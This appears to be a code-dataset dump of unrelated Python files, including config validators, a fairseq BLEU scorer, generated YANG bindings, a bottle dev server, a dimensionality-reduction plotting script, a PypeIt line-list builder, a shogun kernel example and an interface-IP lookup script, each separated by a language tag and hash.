Used by the RegexStr class to dynamically build and recompile regular
expression attributes of a validated object. This object replaces the normal
object returned from re.compile which is immutable.
When the value of this object is a string, that string is simply used as the
regular expression when recompilation is needed. If the state of this object
is a list of strings, the strings are joined in to a single 'or' expression.
"""
def __init__(self, attribute, value, key):
"""Initialize recompilable regex value.
Args:
attribute: Attribute validator associated with this regex value.
value: Initial underlying python value for regex string. Either a single
regex string or a list of regex strings.
key: Name of the field.
"""
self.__attribute = attribute
self.__value = value
self.__regex = None
self.__key = key
def __AsString(self, value):
"""Convert a value to appropriate string.
Returns:
String version of value with all carriage returns and line feeds removed.
"""
if issubclass(self.__attribute.expected_type, str):
cast_value = TYPE_STR(value)
else:
cast_value = TYPE_UNICODE(value)
cast_value = cast_value.replace('\n', '')
cast_value = cast_value.replace('\r', '')
return cast_value
def __BuildRegex(self):
"""Build regex string from state.
Returns:
String version of regular expression. Sequence objects are constructed
as larger regular expression where each regex in the list is joined with
all the others as single 'or' expression.
"""
if isinstance(self.__value, list):
value_list = self.__value
sequence = True
else:
value_list = [self.__value]
sequence = False
regex_list = []
for item in value_list:
regex_list.append(self.__AsString(item))
if sequence:
return '|'.join('%s' % item for item in regex_list)
else:
return regex_list[0]
def __Compile(self):
"""Build regular expression object from state.
Returns:
Compiled regular expression based on internal value.
"""
regex = self.__BuildRegex()
try:
return re.compile(regex)
except re.error, e:
raise ValidationError('Value \'%s\' for %s does not compile: %s' %
(regex, self.__key, e), e)
@property
def regex(self):
"""Compiled regular expression as described by underlying value."""
return self.__Compile()
def match(self, value):
"""Match against internal regular expression.
Returns:
Regular expression object built from underlying value.
"""
return re.match(self.__BuildRegex(), value)
def Validate(self):
"""Ensure that regex string compiles."""
self.__Compile()
def __str__(self):
"""Regular expression string as described by underlying value."""
return self.__BuildRegex()
def __eq__(self, other):
"""Comparison against other regular expression string values."""
if isinstance(other, _RegexStrValue):
return self.__BuildRegex() == other.__BuildRegex()
return str(self) == other
def __ne__(self, other):
"""Inequality operator for regular expression string value."""
return not self.__eq__(other)
class RegexStr(Validator):
"""Validates that a string can compile as a regex without errors.
Use this validator when the value of a field should be a regex. That
means that the value must be a string that can be compiled by re.compile().
The attribute will then be a compiled re object.
"""
def __init__(self, string_type=unicode, default=None):
"""Initialized regex validator.
Raises:
AttributeDefinitionError: if string_type is not a kind of string.
"""
if default is not None:
default = _RegexStrValue(self, default, None)
re.compile(str(default))
super(RegexStr, self).__init__(default)
if (not issubclass(string_type, basestring) or
string_type is basestring):
raise AttributeDefinitionError(
'RegexStr fields must be a string type not %s.' % str(string_type))
self.expected_type = string_type
def Validate(self, value, key):
"""Validates that the string compiles as a regular expression.
Because the regular expression might have been expressed as a multiline
string, this function also strips newlines out of value.
Args:
value: String to compile as a regular expression.
key: Name of the field being validated.
Raises:
ValidationError: when value does not compile as a regular expression or
when value does not match the provided string type.
"""
if isinstance(value, _RegexStrValue):
return value
value = _RegexStrValue(self, value, key)
value.Validate()
return value
def ToValue(self, value):
"""Returns the RE pattern for this validator."""
return str(value)
class Range(Validator):
"""Validates that numbers fall within the correct range.
In theory this class can be emulated using Options, however error
messages generated from that class will not be very intelligible.
This class essentially does the same thing, but knows the intended
integer range.
Also, this range class supports floats and other types that implement
ordinality.
The range is inclusive, meaning 3 is considered in the range
in Range(1,3).
"""
def __init__(self, minimum, maximum, range_type=int, default=None):
"""Initializer for range.
At least one of minimum and maximum must be supplied.
Args:
minimum: Minimum for attribute.
maximum: Maximum for attribute.
range_type: Type of field. Defaults to int.
Raises:
AttributeDefinitionError: if the specified parameters are incorrect.
"""
super(Range, self).__init__(default)
if minimum is None and maximum is None:
raise AttributeDefinitionError('Must specify minimum or maximum.')
if minimum is not None and not isinstance(minimum, range_type):
raise AttributeDefinitionError(
'Minimum value must be of type %s, instead it is %s (%s).' %
(str(range_type), str(type(minimum)), str(minimum)))
if maximum is not None and not isinstance(maximum, range_type):
raise AttributeDefinitionError(
'Maximum value must be of type %s, instead it is %s (%s).' %
(str(range_type), str(type(maximum)), str(maximum)))
self.minimum = minimum
self.maximum = maximum
self.expected_type = range_type
self._type_validator = Type(range_type)
def Validate(self, value, key):
"""Validate that value is within range.
Validates against range-type then checks the range.
Args:
value: Value to validate.
key: Name of the field being validated.
Raises:
ValidationError: when value is out of range. ValidationError when value
is not of the same range type.
"""
cast_value = self._type_validator.Validate(value, key)
if self.maximum is None and cast_value < self.minimum:
raise ValidationError('Value \'%s\' for %s less than %s'
% (value, key, self.minimum))
elif self.minimum is None and cast_value > self.maximum:
raise ValidationError('Value \'%s\' for %s greater than %s'
% (value, key, self.maximum))
elif ((self.minimum is not None and cast_value < self.minimum) or
(self.maximum is not None and cast_value > self.maximum)):
raise ValidationError('Value \'%s\' for %s is out of range %s - %s'
% (value, key, self.minimum, self.maximum))
return cast_value
class Repeated(Validator):
"""Repeated field validator.
Indicates that attribute is expected to be a repeated value, ie,
a sequence. This adds additional validation over just Type(list)
in that it retains information about what can be stored in the list by
use of its constructor field.
"""
def __init__(self, constructor, default=None):
"""Initializer for repeated field.
Args:
constructor: Type used for verifying elements of sequence attribute.
"""
super(Repeated, self).__init__(default)
self.constructor = constructor
self.expected_type = list
def Validate(self, value, key):
"""Do validation of sequence.
Value must be a list and all elements must be of type 'constructor'.
Args:
value: Value to validate.
key: Name of the field being validated.
Raises:
ValidationError: if value is None, not a list or one of its elements is
the wrong type.
"""
if not isinstance(value, list):
raise ValidationError('Value \'%s\' for %s should be a sequence but '
'is not.' % (value, key))
for item in value:
if isinstance(self.constructor, Validator):
item = self.constructor.Validate(item, key)
elif not isinstance(item, self.constructor):
raise ValidationError('Value element \'%s\' for %s must be type %s.' % (
str(item), key, self.constructor.__name__))
return value
class TimeValue(Validator):
"""Validates time values with units, such as 1h or 3.5d."""
_EXPECTED_SYNTAX = ('must be a non-negative number followed by a time unit, '
'such as 1h or 3.5d')
def __init__(self):
super(TimeValue, self).__init__()
self.expected_type = str
def Validate(self, value, key):
"""Validate a time value.
Args:
value: Value to validate.
key: Name of the field being validated.
Raises:
ValidationError: if value is not a time value with the expected format.
"""
if not isinstance(value, basestring):
raise ValidationError("Value '%s' for %s is not a string (%s)"
% (value, key, TimeValue._EXPECTED_SYNTAX))
if not value:
raise ValidationError("Value for %s is empty (%s)"
% (key, TimeValue._EXPECTED_SYNTAX))
if value[-1] not in "smhd":
raise ValidationError("Value '%s' for %s must end with a time unit, "
"one of s (seconds), m (minutes), h (hours), "
"or d (days)" % (value, key))
try:
t = float(value[:-1])
except ValueError:
raise ValidationError("Value '%s' for %s is not a valid time value (%s)"
% (value, key, TimeValue._EXPECTED_SYNTAX))
if t < 0:
raise ValidationError("Value '%s' for %s is negative (%s)"
% (value, key, TimeValue._EXPECTED_SYNTAX))
return value
|
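The TimeValue validator above only checks syntax. A minimal, self-contained sketch of the same parse, extended with an assumed unit-to-seconds table (the conversion is not part of the module above), shows what accepting values like 1h or 3.5d amounts to:

# Minimal sketch mirroring TimeValue's check: a non-negative number followed by
# s, m, h or d. The seconds conversion table is an assumption.
_TIME_UNITS = {'s': 1, 'm': 60, 'h': 3600, 'd': 86400}

def parse_time_value(value):
    if not value or value[-1] not in _TIME_UNITS:
        raise ValueError('expected a number followed by s, m, h or d: %r' % (value,))
    amount = float(value[:-1])  # raises ValueError if the numeric part is bad
    if amount < 0:
        raise ValueError('time value must be non-negative: %r' % (value,))
    return amount * _TIME_UNITS[value[-1]]

print(parse_time_value('1h'))    # 3600.0
print(parse_time_value('3.5d'))  # 302400.0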
py | 1a49f1f5ba8130262c73bcca5149ffbcc8cf42fe | from typing import Literal
from pydantic import BaseModel, HttpUrl, PositiveInt, constr
class Observability(BaseModel):
POWERTOOLS_SERVICE_NAME: constr(min_length=1)
LOG_LEVEL: Literal['DEBUG', 'INFO', 'ERROR', 'CRITICAL', 'WARNING', 'EXCEPTION']
class DynamicConfiguration(BaseModel):
CONFIGURATION_APP: constr(min_length=1)
CONFIGURATION_ENV: constr(min_length=1)
CONFIGURATION_NAME: constr(min_length=1)
CONFIGURATION_MAX_AGE_MINUTES: PositiveInt
class MyHandlerEnvVars(Observability, DynamicConfiguration):
REST_API: HttpUrl
ROLE_ARN: constr(min_length=20, max_length=2048)
|
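A hedged usage sketch for the settings models above: in a Lambda-style handler they are typically populated straight from the process environment. The module name my_handler_env and the printed fields are assumptions, not part of the original file.

import os

# Hypothetical import path; assumes the models above live in my_handler_env.py
from my_handler_env import MyHandlerEnvVars

# pydantic ignores unknown keys by default, so passing the whole environment works;
# a ValidationError is raised if a required variable is missing or malformed.
env_vars = MyHandlerEnvVars(**os.environ)
print(env_vars.REST_API, env_vars.CONFIGURATION_MAX_AGE_MINUTES)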
py | 1a49f2f4f413c5efed3dcd3507afc7d6ed57c0e3 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import ctypes
import math
import torch
from fairseq.scoring import register_scoring
try:
from fairseq import libbleu
except ImportError as e:
import sys
sys.stderr.write("ERROR: missing libbleu.so. run `pip install --editable .`\n")
raise e
C = ctypes.cdll.LoadLibrary(libbleu.__file__)
class BleuStat(ctypes.Structure):
_fields_ = [
("reflen", ctypes.c_size_t),
("predlen", ctypes.c_size_t),
("match1", ctypes.c_size_t),
("count1", ctypes.c_size_t),
("match2", ctypes.c_size_t),
("count2", ctypes.c_size_t),
("match3", ctypes.c_size_t),
("count3", ctypes.c_size_t),
("match4", ctypes.c_size_t),
("count4", ctypes.c_size_t),
]
@register_scoring("sacrebleu")
class SacrebleuScorer(object):
def __init__(self, *unused):
import sacrebleu
self.sacrebleu = sacrebleu
self.reset()
def reset(self, one_init=False):
if one_init:
raise NotImplementedError
self.ref = []
self.sys = []
def add_string(self, ref, pred):
self.ref.append(ref)
self.sys.append(pred)
def score(self, order=4):
return self.result_string(order).score
def result_string(self, order=4, tokenize=None):
if order != 4:
raise NotImplementedError
if tokenize:
return self.sacrebleu.corpus_bleu(self.sys, [self.ref], tokenize=tokenize).format()
return self.sacrebleu.corpus_bleu(self.sys, [self.ref]).format()
@register_scoring("bleu")
class Scorer(object):
def __init__(self, pad, eos, unk):
self.stat = BleuStat()
self.pad = pad
self.eos = eos
self.unk = unk
self.reset()
def reset(self, one_init=False):
if one_init:
C.bleu_one_init(ctypes.byref(self.stat))
else:
C.bleu_zero_init(ctypes.byref(self.stat))
def add(self, ref, pred):
if not isinstance(ref, torch.IntTensor):
raise TypeError("ref must be a torch.IntTensor (got {})".format(type(ref)))
if not isinstance(pred, torch.IntTensor):
raise TypeError("pred must be a torch.IntTensor(got {})".format(type(pred)))
# don't match unknown words
rref = ref.clone()
assert not rref.lt(0).any()
rref[rref.eq(self.unk)] = -999
rref = rref.contiguous().view(-1)
pred = pred.contiguous().view(-1)
C.bleu_add(
ctypes.byref(self.stat),
ctypes.c_size_t(rref.size(0)),
ctypes.c_void_p(rref.data_ptr()),
ctypes.c_size_t(pred.size(0)),
ctypes.c_void_p(pred.data_ptr()),
ctypes.c_int(self.pad),
ctypes.c_int(self.eos),
)
def score(self, order=4):
psum = sum(
math.log(p) if p > 0 else float("-Inf") for p in self.precision()[:order]
)
return self.brevity() * math.exp(psum / order) * 100
def precision(self):
def ratio(a, b):
return a / b if b > 0 else 0
return [
ratio(self.stat.match1, self.stat.count1),
ratio(self.stat.match2, self.stat.count2),
ratio(self.stat.match3, self.stat.count3),
ratio(self.stat.match4, self.stat.count4),
]
def brevity(self):
r = self.stat.reflen / self.stat.predlen
return min(1, math.exp(1 - r))
def result_string(self, order=4):
assert order <= 4, "BLEU scores for order > 4 aren't supported"
fmt = "BLEU{} = {:2.2f}, {:2.1f}"
for _ in range(1, order):
fmt += "/{:2.1f}"
fmt += " (BP={:.3f}, ratio={:.3f}, syslen={}, reflen={})"
bleup = [p * 100 for p in self.precision()[:order]]
return fmt.format(
order,
self.score(order=order),
*bleup,
self.brevity(),
self.stat.predlen / self.stat.reflen,
self.stat.predlen,
self.stat.reflen
)
|
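The corpus-level score in Scorer.score above is a geometric mean of the n-gram precisions scaled by a brevity penalty. A self-contained restatement of that arithmetic, with made-up precision numbers for illustration:

import math

def bleu_from_stats(precisions, ref_len, pred_len):
    # geometric mean of the n-gram precisions, computed in log space
    psum = sum(math.log(p) if p > 0 else float('-inf') for p in precisions)
    # brevity penalty: min(1, e^(1 - reflen/predlen)), as in Scorer.brevity()
    brevity = min(1.0, math.exp(1 - ref_len / pred_len))
    return brevity * math.exp(psum / len(precisions)) * 100

# illustrative numbers only
print(bleu_from_stats([0.8, 0.6, 0.45, 0.35], ref_len=100, pred_len=95))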
py | 1a49f33e13ba0fb7f94474a48fed75f8fb7cfb09 | from typing import Optional
import attr
from .action_abstract_test_summary import ActionAbstractTestSummary
from . import helpers
@attr.s
class ActionTestSummaryIdentifiableObject(ActionAbstractTestSummary):
identifier: Optional[str] = attr.ib()
@classmethod
def convert_identifier_field(cls, report: dict) -> Optional[str]:
return helpers.string_from_report(report.get("identifier"), dict(default=None))
|
py | 1a49f40f82ccd714cbf0bd1901239cfd5d87403f |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import allowed
class trunk_vlan_classification(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-interface - based on the path /interface/gigabitethernet/switchport/trunk/trunk-vlan-classification. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__allowed',)
_yang_name = 'trunk-vlan-classification'
_rest_name = ''
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__allowed = YANGDynClass(base=allowed.allowed, is_container='container', presence=False, yang_name="allowed", rest_name="allowed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set the VLANs that will Xmit/Rx through the Layer2\ninterface', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-interface', defining_module='brocade-interface', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'interface', u'gigabitethernet', u'switchport', u'trunk', u'trunk-vlan-classification']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'interface', u'GigabitEthernet', u'switchport', u'trunk']
def _get_allowed(self):
"""
Getter method for allowed, mapped from YANG variable /interface/gigabitethernet/switchport/trunk/trunk_vlan_classification/allowed (container)
YANG Description: Set the VLANs that will Xmit/Rx through the Layer2
interface
"""
return self.__allowed
def _set_allowed(self, v, load=False):
"""
Setter method for allowed, mapped from YANG variable /interface/gigabitethernet/switchport/trunk/trunk_vlan_classification/allowed (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_allowed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_allowed() directly.
YANG Description: Set the VLANs that will Xmit/Rx through the Layer2
interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=allowed.allowed, is_container='container', presence=False, yang_name="allowed", rest_name="allowed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set the VLANs that will Xmit/Rx through the Layer2\ninterface', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-interface', defining_module='brocade-interface', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """allowed must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=allowed.allowed, is_container='container', presence=False, yang_name="allowed", rest_name="allowed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set the VLANs that will Xmit/Rx through the Layer2\ninterface', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-interface', defining_module='brocade-interface', yang_type='container', is_config=True)""",
})
self.__allowed = t
if hasattr(self, '_set'):
self._set()
def _unset_allowed(self):
self.__allowed = YANGDynClass(base=allowed.allowed, is_container='container', presence=False, yang_name="allowed", rest_name="allowed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set the VLANs that will Xmit/Rx through the Layer2\ninterface', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-interface', defining_module='brocade-interface', yang_type='container', is_config=True)
allowed = __builtin__.property(_get_allowed, _set_allowed)
_pyangbind_elements = {'allowed': allowed, }
|
py | 1a49f474f7e09d82d81adc1999a11d91ade24e67 | """Binaries"""
from __future__ import print_function
from collections import defaultdict
import sys
def print_table(rows, headers=None, space_between_columns=4):
"""
Convenience method for printing a list of dictionary objects into a table. Automatically sizes the
columns to be the maximum size of any entry in the dictionary, and adds additional buffer whitespace.
Params:
rows - A list of dictionaries representing a table of information, where keys are the
headers of the table. Ex. { 'Name': 'John', 'Age': 23 }
headers - A list of the headers to print for the table. Must be a subset of the keys of
                  the dictionaries that compose the row. If a header isn't present or its value
                  is falsy, the value printed is '-'.
space_between_columns - The amount of space between the columns of text. Defaults to 4.
"""
columns_to_sizing = defaultdict(int)
format_string = ''
headers = headers or rows[0].keys()
for row in rows:
for header in headers:
value = row.get(header, '-')
columns_to_sizing[header] = max(len(str(value)), columns_to_sizing[header])
for header in headers:
column_size = max(columns_to_sizing[header], len(header)) + space_between_columns
format_string += '{' + header + ':<' + str(column_size) + '}'
print(format_string.format(**{key: key for key in headers}), file=sys.stderr)
for row in rows:
defaulted_row = {header: row.get(header) or '-' for header in headers}
print(format_string.format(**defaulted_row))
|
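A usage example for the print_table helper above (the rows are invented); note that the header line goes to stderr and the data rows to stdout, so redirected output stays machine-friendly.

people = [
    {'Name': 'John', 'Age': 23},
    {'Name': 'Alexandra', 'Age': 41},
    {'Name': 'Wu'},  # missing 'Age' is rendered as '-'
]
print_table(people, headers=['Name', 'Age'])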
py | 1a49f4a9b776aef127b3b8913f29c2fddb49d679 | """
This script runs the application using a development server.
"""
import bottle
import os
import sys
# routes contains the HTTP handlers for our server and must be imported.
import routes
import src.emotion_bottle
if '--debug' in sys.argv[1:] or 'SERVER_DEBUG' in os.environ:
# Debug mode will enable more verbose output in the console window.
# It must be set at the beginning of the script.
bottle.debug(True)
def wsgi_app():
"""Returns the application to make available through wfastcgi. This is used
when the site is published to Microsoft Azure."""
return bottle.default_app()
if __name__ == '__main__':
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static').replace('\\', '/')
HOST = os.environ.get('SERVER_HOST', 'localhost')
try:
PORT = int(os.environ.get('SERVER_PORT', '5555'))
except ValueError:
PORT = 5555
@bottle.route('/static/<filepath:path>')
def server_static(filepath):
"""Handler for static files, used with the development server.
When running under a production server such as IIS or Apache,
the server should be configured to serve the static files."""
return bottle.static_file(filepath, root=STATIC_ROOT)
# Starts a local test server.
bottle.run(server='wsgiref', host=HOST, port=PORT)
|
py | 1a49f5a56218c9022e25776dcd9997782d4f1f23 | import glob
import operator
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
import scipy
from scipy import ndimage
from sklearn.decomposition import PCA
from sklearn.manifold import MDS
from sklearn.manifold import TSNE
import sys
#run pca
def pca_red(X):
pca = PCA(n_components=1)
pca.fit(X)
print "variance explained by pca"
print pca.explained_variance_ratio_
return pca.transform(X)
#run mds
def mds_red(X):
mds = MDS(n_components=1)
return mds.fit_transform(X)
#run tsne
def tsne_red(X):
tsne = TSNE(n_components=2)
return tsne.fit_transform(X)
#make plots
def scatter_plot(data,labels,outname):
plt.ioff()
fig=plt.figure(figsize=(8,6))
axes=plt.gca()
plt.xticks(fontsize=15)
plt.xlabel("PC1",fontsize=20)
axes.set_yticklabels([])
plt.scatter(data,[0]*len(data),s=70)
for label, x in zip(labels,data):
plt.annotate(label,xy=(x,0),xytext=(-5,5),textcoords='offset points')
plt.savefig(outname)
plt.close()
#print input for the dimensionality reduction
def printmat(indices,faclst,inmat,outname):
outs="#\t"
for ind in indices:
outs=outs+str(ind)+"\t"
outs=outs+"\n"
for i in range(0,len(inmat)):
slist=[str(x) for x in inmat[i]]
outs=outs+faclst[i]+"\t"+"\t".join(slist)+"\n"
with open(outname,'w')as mout:
mout.write(outs)
##############
#main
try:
flistname=sys.argv[1]
except IndexError:
print("please provide path to file list")
    sys.exit(1)
flist=[]
with open(flistname) as f:
for line in f:
flist.append(line.rstrip())
all_indices=[]
results={}
for f in flist:
with open(f,'r') as mlf:
firstline=mlf.readline().rstrip().split("\t")
for words in firstline:
if "XL" in words:
ind=words.split(',')[1]
all_indices.append(ind)
tmp_l=list(set(all_indices))
temp_num=sorted([int(x) for x in tmp_l])
indices=[str(x) for x in temp_num]
for f in flist:
factor=f.split(".")[1]
d={} #dictionary contains position mapping to column number
# get column index for positions
with open(f,'r') as mlf:
firstline=mlf.readline().rstrip().split("\t")
for index in indices:
for i in range(0,len(firstline)):
if "XL" in firstline[i]:
currcol=firstline[i].split(',')[1]
if str(index) == currcol:
d[index]=i
xl={}
for index in indices:
xl[index]=0
for line in mlf:
back=line.rstrip().split("\t")[2]
for index in indices:
if index in d:
xl[index]+=float(line.rstrip().split("\t")[d[index]])
else:
xl[index]+=0
results[factor]=xl
faclst=[]
mat=[]
for key in results:
faclst.append(key)
val=results[key]
flst=[]
for i in indices:
flst.append(val[i])
mat.append(flst)
#normalize
nmat=[]
for row in mat:
nrowmat=[]
rowsum=0
for i in row:
rowsum=rowsum+i
for i in row:
nrowmat.append(i/rowsum)
nmat.append(nrowmat)
#print input matrix for dimentionality reduction
#printmat(indices,faclst,mat,'mat.out')
printmat(indices,faclst,nmat,'nmat.out')
#perform dimentionality reduction
x=np.array(nmat)
pca_mat=pca_red(x)
mds_mat=mds_red(x)
tsne_mat=tsne_red(x)
#make plots
scatter_plot(pca_mat,faclst,"pca_test.png")
scatter_plot(mds_mat,faclst,"mds_test.png")
|
py | 1a49f6224fcdd65760cbe10e801bd72bb69fe1fa | """
Module for generating Arc Line lists
Should be run where it is located (for now)
"""
from __future__ import print_function, absolute_import, division, unicode_literals
import os
import pdb
import datetime
from pkg_resources import resource_filename
from collections import OrderedDict
from astropy.table import Table, Column
line_path = resource_filename('pypeit', '/data/arc_lines/lists/')
nist_path = resource_filename('pypeit', '/data/arc_lines/NIST/')
def parser(options=None):
import argparse
# Parse
parsefunc = argparse.ArgumentParser(
description='Build the PypeIt line lists from NIST tables')
parsefunc.add_argument("-w", "--write", default=False, action='store_true', help="Actually write files?")
parsefunc.add_argument("--skip_stop", default=False, action='store_true', help="Skip warning stop?")
parsefunc.add_argument("-r", "--relint", type=float, default=1000.0, help="Set the relative intensity threshold")
parsefunc.add_argument("line", default='', help="Name of ion")
if options is None:
args = parsefunc.parse_args()
else:
args = parsefunc.parse_args(options)
return args
def init_line_list():
""" Initialize a Table for a linelist
Rigidly enforces table column formats
Strings are the most annoying
Returns
-------
init_tbl : Table
One dummy row
"""
dummy_src = str('#')*50
# Arc Line name
dummy_line = str('#')*8
#
# Dict for Table
idict = OrderedDict()
idict['ion'] = dummy_line
idict['wave'] = 0.
idict['NIST'] = 0
idict['Instr'] = 0 # Flag for instrument
idict['amplitude'] = 0
idict['Source'] = dummy_src
# Table
tkeys = idict.keys()
lst = [[idict[tkey]] for tkey in tkeys]
init_tbl = Table(lst, names=tkeys)
# Return
return init_tbl
def load_line_list(line):
"""
Parameters
----------
line : str
Name of ion
Returns
-------
line_list : Table
"""
line_file = nist_path + '{:s}_vacuum.ascii'.format(line)
# Check the NIST lines file exists
if not os.path.isfile(line_file):
raise IOError("Input line {:s} is not available".format(line))
line_list = Table.read(line_file, format='ascii.fixed_width', comment='#')
# Remove unwanted columns
tkeys = line_list.keys()
for badkey in ['Ritz', 'Acc.', 'Type', 'Ei', 'Lower', 'Upper', 'TP', 'Line']:
for tkey in tkeys:
if badkey in tkey:
line_list.remove_column(tkey)
# Relative intensity -- Strip junk off the end
reli = []
for imsk, idat in zip(line_list['Rel.'].mask, line_list['Rel.'].data):
if imsk:
reli.append(0.)
else:
try:
reli.append(float(idat))
except ValueError:
try:
reli.append(float(idat[:-1]))
except ValueError:
reli.append(0.)
line_list.remove_column('Rel.')
line_list['Rel.'] = reli
#
gdrows = line_list['Observed'] > 0. # Eliminate dummy lines
line_list = line_list[gdrows]
line_list.rename_column('Observed', 'wave')
# Others
# Grab ion name
i0 = line_file.rfind('/')
i1 = line_file.rfind('_')
ion = line_file[i0+1:i1]
line_list.add_column(Column([ion]*len(line_list), name='Ion', dtype='U5'))
line_list.add_column(Column([1]*len(line_list), name='NIST'))
return line_list
def main(args=None):
""" This script convert an input NIST table into a line list that can be used by PypeIt
Parameters
----------
args
Returns
-------
"""
# Grab arguments
pargs = parser(options=args)
line = pargs.line
relIntThreshold = pargs.relint
print("=============================================================")
print("This script is for EXPERTS ONLY")
print("Continue only if you know what you are doing")
print("Otherwise exit")
print("p.s. You need to remove the files you wish to re-build")
print("=============================================================")
if not pargs.skip_stop:
pdb.set_trace()
# Load the NIST ThAr list
llist = load_line_list(line)
# ['wave', 'Aki', 'Rel.', 'Ion', 'NIST']
# Generate a table
linelist = init_line_list()
# now add all NIST lines
nlines = llist['Ion'].size
for ll in range(nlines):
if llist['Rel.'][ll] > relIntThreshold:
linelist.add_row([llist['Ion'][ll], llist['wave'][ll], 1, 0, llist['Rel.'][ll], 'NIST'])
        if (ll + 1) % 100 == 0:
print(ll+1, '/', nlines)
# Remove the first dummy row
linelist.remove_row(0)
# Finally, sort the list by increasing wavelength
linelist.sort('wave')
# Write?
if not pargs.write:
print("=============================================================")
print("Rerun with --write if you are happy with what you see.")
print("=============================================================")
return
# Write the table to disk
outfile = line_path + '{:s}_lines.dat'.format(line)
write_line_list(linelist, outfile)
return
def write_line_list(tbl, outfile):
"""
Parameters
----------
tbl
outfile
"""
# Format
tbl['wave'].format = '10.4f'
# Write
with open(outfile, 'w') as f:
f.write('# Creation Date: {:s}\n'.format(str(datetime.date.today().strftime('%Y-%m-%d'))))
tbl.write(f, format='ascii.fixed_width')
if __name__ == '__main__':
main()
|
py | 1a49f81e96b4c485e80ace18a104ccd2fb403f76 | #!/usr/bin/env python
from tools.load import LoadMatrix
import numpy as np
lm=LoadMatrix()
traindat = np.ushort(lm.load_numbers('../data/fm_train_word.dat'))
testdat = np.ushort(lm.load_numbers('../data/fm_test_word.dat'))
parameter_list=[[traindat,testdat,1.2],[traindat,testdat,1.2]]
def kernel_linear_word (fm_train_word=traindat,fm_test_word=testdat,scale=1.2):
import shogun as sg
feats_train=sg.create_features(fm_train_word)
feats_test=sg.create_features(fm_test_word)
kernel=sg.create_kernel("LinearKernel")
kernel.init(feats_train, feats_train)
kernel.set_normalizer(sg.create_kernel_normalizer("AvgDiagKernelNormalizer", scale=scale))
kernel.init(feats_train, feats_train)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return kernel
if __name__=='__main__':
print('LinearWord')
kernel_linear_word(*parameter_list[0])
|
py | 1a49f86e4ba626b34a3363d5c0be3f43e1f4c00d | # -*- coding: utf-8 -*-
#!/usr/bin/env python
'''
Program for finding the IP address of the wlan interface.
'''
import socket
import fcntl
import sys
def ifconfig(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
result = fcntl.ioctl(s.fileno(), 0x8915 ,(ifname+'\0'*32)[:32])
except IOError:
return None
return socket.inet_ntoa(result[20:24])
if __name__ == '__main__':
print (ifconfig(sys.argv[1]))
|
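A hedged usage sketch for the ifconfig helper above: the ioctl code 0x8915 is SIOCGIFADDR, so the call asks the kernel for the IPv4 address bound to the named interface (Linux only). The module name wlan_ip and the interface name are assumptions.

from wlan_ip import ifconfig  # hypothetical module name for the file above

address = ifconfig('wlan0')   # e.g. '192.168.1.42', or None if the ioctl fails
print(address)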
py | 1a49fa2507f2211e6177a8b23df7bc221f828027 | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
